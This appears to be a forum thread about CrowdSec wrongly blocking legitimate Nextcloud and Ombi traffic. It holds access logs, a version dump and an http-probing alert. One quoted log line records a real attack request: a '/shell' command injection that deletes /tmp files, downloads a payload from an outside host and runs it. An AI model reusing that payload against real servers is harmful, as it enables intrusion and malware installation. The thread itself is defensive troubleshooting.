xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/package-x-generic.svg?v=0 HTTP/1.1" 200 1223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=20714 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4768 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=191296 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=257268 HTTP/1.1" 200 7218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:05 +0200] "GET /nextcloud/core/img/rating/s4.svg HTTP/1.1" 200 2040 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"

I would like to know why I get blocked and stuff like this not:

95.137.137.171 - - [07/Aug/2022:23:27:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws" 400 483 "-" "-"
106.75.50.30 - - [08/Aug/2022:10:59:31 +0200] "GET / HTTP/1.1" 200 5563 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /favicon.ico HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /sitemap.xml HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:38 +0200] "GET /robots.txt HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"

Hello,

Given the behavior of ombi, I do not a see a “generic” workaround for this (it would require crowdsec to do smart things and be too sensitive to false negatives).

I think the best way would be to have a whitelist for ombi to avoid this specific false positive. It should even be part of the ombi collection created by @lepresidente : CrowdSec Hub

Do you believe this false positive impacts all the default setups ?

Hi,

I’m also having some difficulties with nextcloud 25.01 and crowdsec. A specific user is systematically blocked, when using the client or a webdav mount in the file explorer, from a Windows 10 system. I think that this user is being blocked because he’s trying to set up his environment and thus adding and moving (or at least trying to add or move) a lot of files in a short period. But I cannot find what is triggering the alerts and decisions, except that it’s systematically the same reason: http-probing.

I nonetheless tried to set a whitelist, but my attemps so far didn’t succeed.

Crowdsec version:

❯ cscli version
2022/11/29 21:02:23 version: v1.4.2-debian-pragmatic-3beb84bcfe05885fdd9a00f3124b4a949e45ce82
2022/11/29 21:02:23 Codename: alphaga
2022/11/29 21:02:23 BuildDate: 2022-11-15_12:45:52
2022/11/29 21:02:23 GoVersion: 1.19.2
2022/11/29 21:02:23 Platform: linux
2022/11/29 21:02:23 Constraint_parser: >= 1.0, <= 2.0
2022/11/29 21:02:23 Constraint_scenario: >= 1.0, < 3.0
2022/11/29 21:02:23 Constraint_api: v1
2022/11/29 21:02:23 Constraint_acquis: >= 1.0, < 2.0

Alert 1, with the corresponding apache log. The cscli time is UTC, and my server is on UTC+01:00.

❯ cscli alerts inspect xxxx

################################################################################################

 - ID         : xxxx
 - Date       : 2022-11-29T15:49:02Z
 - Machine    : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 - Simulation : false
 - Reason     : crowdsecurity/http-probing
 - Events Count : 13
 - Scope:Value: Ip:xxx.xxx.xxx.xxx
 - Country    : CH
 - AS         : Corp Inc.
 - Begin      : 2022-11-29 15:48:37.644899066 +0000 UTC
 - End        : 2022-11-29 15:49:01.412840179 +0000 UTC



xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:36 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 2345 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3010 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1116 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/AutoRun.inf HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3036 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7603 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:59 +0100] "GET /cloud/ocs/v2.php/apps/notifications/api/v2/notifications HTTP/1.1" 304 7054 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Viewer/99.9.3878.79"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012724915251034f3b47f&x=256&y=256 HTTP/1.1" 404 6535 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012829845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836525251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836035251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836795251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835565251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835745251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836325251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835465251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
